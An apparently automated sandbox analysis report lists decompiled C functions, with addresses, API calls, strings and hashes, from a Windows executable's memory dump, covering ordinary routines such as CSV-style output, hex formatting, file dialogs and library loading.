Uniqueness Score: -1.00%

Function 00407362, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				wchar_t* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				signed int _t39;
				wchar_t* _t41;
				signed int _t45;
				signed int _t48;
				wchar_t* _t53;
				wchar_t* _t62;
				void* _t66;
				intOrPtr* _t68;
				void* _t70;
				wchar_t* _t75;
				wchar_t* _t79;

				_t66 = __ebx;
				_t75 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
						_t68 = _a8;
						if(_t68 != _t75) {
							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
						} else {
							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
						}
						_t41 = wcschr(_t79, 0x2c);
						_pop(_t70);
						if(_t41 != 0) {
							L8:
							_v20 = _t75;
							_v28 = _t75;
							_v36 = _t75;
							_v24 = 0x100;
							_v32 = 1;
							_v16 = 0x22;
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							while(1) {
								_t45 =  *_t79 & 0x0000ffff;
								__eflags = _t45;
								_v12 = _t45;
								_t77 =  &_v36;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t45 - 0x22;
								if(__eflags != 0) {
									_push( &_v12);
									_t48 = 1;
									__eflags = 1;
								} else {
									_push(L"\"\"");
									_t48 = _t45 | 0xffffffff;
								}
								E0040565D(_t48, _t70, _t77, __eflags);
								_t79 =  &(_t79[0]);
								__eflags = _t79;
							}
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							_t53 = _v20;
							__eflags = _t53;
							if(_t53 == 0) {
								_t53 = 0x40c4e8;
							}
							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
							_t75 = 0;
							__eflags = 0;
						} else {
							_t62 = wcschr(_t79, 0x22);
							_pop(_t70);
							if(_t62 != 0) {
								goto L8;
							} else {
								E00407343(_t66, _a4, _t79);
							}
						}
						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
							E00407343(_t66, _a4, ",");
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
				}
				return E00407343(_t66, _a4, L"\r\n");
			}

0x00407362
0x00407369
0x0040736e
0x00407371
0x00407378
0x0040737e
0x00407381
0x00407386
0x0040739f
0x00407388
0x00407391
0x00407391
0x004073a4
0x004073ac
0x004073ad
0x004073cd
0x004073d0
0x004073d3
0x004073d6
0x004073e0
0x004073e7
0x004073ee
0x004073f5
0x0040741a
0x0040741a
0x0040741d
0x00407420
0x00407423
0x00407426
0x00000000
0x00000000
0x004073fc
0x00407400
0x0040740f
0x00407412
0x00407412
0x00407402
0x00407402
0x00407407
0x00407407
0x00407413
0x00407419
0x00407419
0x00407419
0x0040742f
0x00407434
0x00407437
0x00407439
0x0040743b
0x0040743b
0x0040744e
0x00407453
0x00407453
0x004073af
0x004073b2
0x004073ba
0x004073bb
0x00000000
0x004073bd
0x004073c3
0x004073c3
0x004073bb
0x0040745c
0x00407468
0x00407468
0x0040746d
0x00407473
0x0040747c
0x0040748e

APIs

wcschr.MSVCRT ref: 004073A4
wcschr.MSVCRT ref: 004073B2

Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D

Strings

", xrefs: 004073EE

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcschr$memcpywcslen
String ID: "
API String ID: 1983396471-123907689
Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00401676, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v80;
				signed short _v65616;
				void* _t27;
				intOrPtr _t28;
				void* _t34;
				intOrPtr _t39;
				intOrPtr* _t51;
				void* _t52;

				_t51 = __esi;
				E0040B550(0x1004c, __ecx);
				_t39 = 0;
				_push(0);
				_push( &_v8);
				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
				_push(L"Lines");
				_t27 =  *((intOrPtr*)( *__esi))();
				if(_v8 > 0) {
					do {
						_t6 = _t39 + 1; // 0x1
						_t28 = _t6;
						_push(_t28);
						_push(L"Line%d");
						_v12 = _t28;
						_push(0x1f);
						_push( &_v80);
						L0040B1EC();
						_t52 = _t52 + 0x10;
						_push(0x7fff);
						_push(0x40c4e8);
						if( *((intOrPtr*)(_t51 + 4)) == 0) {
							_v65616 = _v65616 & 0x00000000;
							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
							_t34 = E004054DF(_a4, _t51,  &_v65616);
						} else {
							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
						}
						_t39 = _v12;
					} while (_t39 < _v8);
					return _t34;
				}
				return _t27;
			}

0x00401676
0x0040167e
0x0040168a
0x0040168c
0x00401690
0x00401691
0x00401696
0x0040169d
0x004016a2
0x004016aa
0x004016aa
0x004016aa
0x004016ad
0x004016ae
0x004016b3
0x004016b9
0x004016bb
0x004016bc
0x004016c1
0x004016c8
0x004016cd
0x004016ce
0x004016ea
0x004016ff
0x0040170c
0x004016d0
0x004016e3
0x004016e3
0x00401711
0x00401714
0x00000000
0x00401719
0x0040171c

APIs

_snwprintf.MSVCRT ref: 004016BC

Strings

Line%d, xrefs: 004016AE
Lines, xrefs: 00401696

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf
String ID: Line%d$Lines
API String ID: 3988819677-2790224864
Opcode ID: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
Opcode Fuzzy Hash: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040512F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v26;
				void _v28;
				void* _t24;
				void* _t25;
				void* _t35;
				signed int _t38;
				signed int _t42;
				void* _t44;
				void* _t45;

				_t24 = _a12;
				_t45 = _t44 - 0x18;
				_t42 = 0;
				 *_t24 = 0;
				if(_a8 <= 0) {
					_t25 = 0;
				} else {
					_t38 = 0;
					_t35 = 0;
					if(_a8 > 0) {
						_v8 = _t24;
						while(1) {
							_v28 = _v28 & 0x00000000;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_push( *(_t35 + _a4) & 0x000000ff);
							_push(L"%2.2X ");
							_push(0xa);
							_push( &_v28);
							L0040B1EC();
							_t38 = _t42;
							memcpy(_v8,  &_v28, 6);
							_t13 = _t42 + 3; // 0x3
							_t45 = _t45 + 0x1c;
							if(_t13 >= 0x2000) {
								break;
							}
							_v8 = _v8 + 6;
							_t35 = _t35 + 1;
							_t42 = _t42 + 3;
							if(_t35 < _a8) {
								continue;
							}
							break;
						}
						_t24 = _a12;
					}
					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
					_t25 = 1;
				}
				return _t25;
			}

0x00405132
0x00405135
0x00405139
0x0040513e
0x00405141
0x004051b3
0x00405143
0x00405145
0x00405147
0x0040514c
0x0040514e
0x00405151
0x00405151
0x0040515b
0x0040515c
0x0040515d
0x0040515e
0x0040515f
0x00405168
0x00405169
0x00405171
0x00405173
0x00405174
0x00405182
0x00405184
0x00405189
0x0040518c
0x00405194
0x00000000
0x00000000
0x00405196
0x0040519a
0x0040519b
0x004051a1
0x00000000
0x00000000
0x00000000
0x004051a1
0x004051a3
0x004051a3
0x004051a6
0x004051af
0x004051b0
0x004051b7

APIs

_snwprintf.MSVCRT ref: 00405174
memcpy.MSVCRT ref: 00405184

Strings

%2.2X , xrefs: 00405169

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfmemcpy
String ID: %2.2X
API String ID: 2789212964-323797159
Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5

Uniqueness

Uniqueness Score: -1.00%

Function 004075BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				char _v44;
				intOrPtr _t22;
				signed int _t30;
				signed int _t34;
				void* _t35;
				void* _t36;

				_t35 = __esi;
				_t34 = 0;
				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
					do {
						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
						L0040B1EC();
						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
						_push( &_v44);
						_push(0x2000);
						_push( *((intOrPtr*)(__esi + 0x60)));
						L0040B1EC();
						_t36 = _t36 + 0x24;
						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
				}
				return E00407343(_t35, _a4, L"\r\n");
			}

0x004075bb
0x004075c2
0x004075c7
0x004075ca
0x004075cd
0x004075d8
0x004075e9
0x004075fc
0x00407600
0x00407601
0x00407606
0x00407609
0x0040760e
0x00407619
0x0040761e
0x0040761f
0x00407624
0x00407636

APIs

_snwprintf.MSVCRT ref: 004075E9
_snwprintf.MSVCRT ref: 00407609

Strings

%%-%d.%ds , xrefs: 004075DE

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf
String ID: %%-%d.%ds
API String ID: 3988819677-2008345750
Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040507A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				wchar_t* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v20 = _a12;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				if(GetOpenFileNameW( &_v80) == 0) {
					return 0;
				} else {
					wcscpy(__esi, _v52);
					return 1;
				}
			}

0x00405080
0x00405086
0x0040508b
0x0040508e
0x00405091
0x00405097
0x0040509d
0x004050a4
0x004050ab
0x004050b2
0x004050b5
0x004050bc
0x004050cb
0x004050e0
0x004050cd
0x004050d1
0x004050dc
0x004050dc

APIs

GetOpenFileNameW.COMDLG32(?), ref: 004050C3
wcscpy.MSVCRT ref: 004050D1

Strings

L, xrefs: 004050A4

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileNameOpenwcscpy
String ID: L
API String ID: 3246554996-2909332022
Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98

Uniqueness

Uniqueness Score: -1.00%

Function 0040906D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __esi;
				_Unknown_base(*)()* _t10;
				void* _t12;
				struct HINSTANCE__** _t13;

				_t13 = __eax;
				_t12 = 0;
				if(E00408F72(__eax) != 0) {
					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
					if(_t10 != 0) {
						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
					}
				}
				return _t12;
			}

0x00409072
0x00409074
0x0040907d
0x00409086
0x0040908e
0x004090a5
0x004090a5
0x0040908e
0x004090ac

APIs

GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086

Strings

LookupAccountSidW, xrefs: 0040907F
Y@, xrefs: 0040906D

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc
String ID: LookupAccountSidW$Y@
API String ID: 190572456-2352570548
Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD85, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040AD85(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;
				char** _t9;

				_t7 = 0;
				_t8 = E00405436(L"shlwapi.dll");
				 *_t9 = "SHAutoComplete";
				_t3 = GetProcAddress(_t8, ??);
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}

0x0040ad8c
0x0040ad93
0x0040ad95
0x0040ad9d
0x0040ada5
0x0040adb2
0x0040adb2
0x0040adb5
0x0040adbf

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5

Strings

shlwapi.dll, xrefs: 0040AD87

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$Load$AddressFreeProcmemsetwcscat
String ID: shlwapi.dll
API String ID: 4092907564-3792422438
Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669

Uniqueness

Uniqueness Score: -1.00%

Function 00406597, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406597(wchar_t* __esi) {
				wchar_t* _t2;
				wchar_t* _t6;

				_t6 = __esi;
				E00404AD9(__esi);
				_t2 = wcsrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 =  *_t2 & 0x00000000;
				}
				return wcscat(_t6, L"_lng.ini");
			}

0x00406597
0x00406598
0x004065a0
0x004065aa
0x004065ac
0x004065ac
0x004065bd

APIs

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

wcsrchr.MSVCRT ref: 004065A0
wcscat.MSVCRT ref: 004065B6

Strings

_lng.ini, xrefs: 004065B0

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleNamewcscatwcsrchr
String ID: _lng.ini
API String ID: 383090722-1948609170
Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AC52() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x4101c4 == 0) {
					_t1 = E00405436(L"shell32.dll");
					 *0x4101c4 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x4101c0 = _t2;
						return _t2;
					}
				}
				return _t1;
			}

0x0040ac59
0x0040ac60
0x0040ac68
0x0040ac6d
0x0040ac75
0x0040ac7b
0x00000000
0x0040ac7b
0x0040ac6d
0x0040ac80

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75

Strings

SHGetSpecialFolderPathW, xrefs: 0040AC6F
shell32.dll, xrefs: 0040AC5B

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$AddressProcmemsetwcscat
String ID: SHGetSpecialFolderPathW$shell32.dll
API String ID: 946536540-880857682
Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E

Uniqueness

Uniqueness Score: -1.00%

Function 00406670, Relevance: 5.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00406670(char** __esi, void* __eflags) {
				char* _t30;
				char** _t39;

				_t39 = __esi;
				 *__esi = "cf@";
				__esi[0xb8] = 0;
				_t30 = E00404FA4(0x338, __esi);
				_push(0x14);
				__esi[0xcb] = 0;
				__esi[0xa6] = 0;
				__esi[0xb9] = 0;
				__esi[0xba] = 0xfff;
				__esi[8] = 0;
				__esi[1] = 0;
				__esi[0xb7] = 1;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[2] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[3] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[4] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_t39[5] = _t30;
				return _t39;
			}

0x00406670
0x0040667a
0x00406680
0x00406686
0x0040668b
0x0040668d
0x00406693
0x00406699
0x0040669f
0x004066a9
0x004066ac
0x004066af
0x004066b9
0x004066c7
0x004066d9
0x004066c9
0x004066c9
0x004066cc
0x004066cf
0x004066d2
0x004066d5
0x004066d5
0x004066db
0x004066dd
0x004066e0
0x004066e8
0x004066fa
0x004066ea
0x004066ea
0x004066ed
0x004066f0
0x004066f3
0x004066f6
0x004066f6
0x004066fc
0x004066fe
0x00406701
0x00406709
0x0040671b
0x0040670b
0x0040670b
0x0040670e
0x00406711
0x00406714
0x00406717
0x00406717
0x0040671d
0x0040671f
0x00406722
0x0040672a
0x0040673c
0x0040672c
0x0040672c
0x0040672f
0x00406732
0x00406735
0x00406738
0x00406738
0x0040673f
0x00406745

APIs

Part of subcall function 00404FA4: memset.MSVCRT ref: 00404FB2

??2@YAPAXI@Z.MSVCRT ref: 004066B9
??2@YAPAXI@Z.MSVCRT ref: 004066E0
??2@YAPAXI@Z.MSVCRT ref: 00406701
??2@YAPAXI@Z.MSVCRT ref: 00406722

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$memset
String ID:
API String ID: 1860491036-0
Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18

Uniqueness

Uniqueness Score: -1.00%

Function 004054DF, Relevance: 5.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
				int _v8;
				signed int _v12;
				void* __edi;
				int _t32;
				intOrPtr _t33;
				intOrPtr _t36;
				signed int _t48;
				signed int _t58;
				signed int _t59;
				void** _t62;
				void** _t63;
				signed int* _t66;

				_t66 = __eax;
				_t32 = wcslen(_a4);
				_t48 =  *(_t66 + 4);
				_t58 = _t48 + _t32;
				_v12 = _t58;
				_t59 = _t58 + 1;
				_v8 = _t32;
				_t33 =  *((intOrPtr*)(_t66 + 0x14));
				 *(_t66 + 4) = _t59;
				_t62 = _t66 + 0x10;
				if(_t59 != 0xffffffff) {
					E00404951(_t66, _t59, _t62, 2, _t33);
				} else {
					free( *_t62);
				}
				_t60 =  *(_t66 + 0x1c);
				_t36 =  *((intOrPtr*)(_t66 + 0x18));
				_t63 = _t66 + 0xc;
				if( *(_t66 + 0x1c) != 0xffffffff) {
					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
				} else {
					free( *_t63);
				}
				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
				_t30 =  *(_t66 + 0x1c) - 1; // -1
				return _t30;
			}

0x004054ea
0x004054ec
0x004054f1
0x004054f4
0x004054f7
0x004054fa
0x004054fe
0x00405501
0x00405505
0x00405508
0x0040550b
0x0040551b
0x0040550d
0x0040550f
0x0040550f
0x00405521
0x00405527
0x0040552b
0x0040552e
0x0040553f
0x00405530
0x00405532
0x00405532
0x00405556
0x00405561
0x0040556e
0x00405571
0x00405578
0x0040557e

APIs

wcslen.MSVCRT ref: 004054EC
free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F

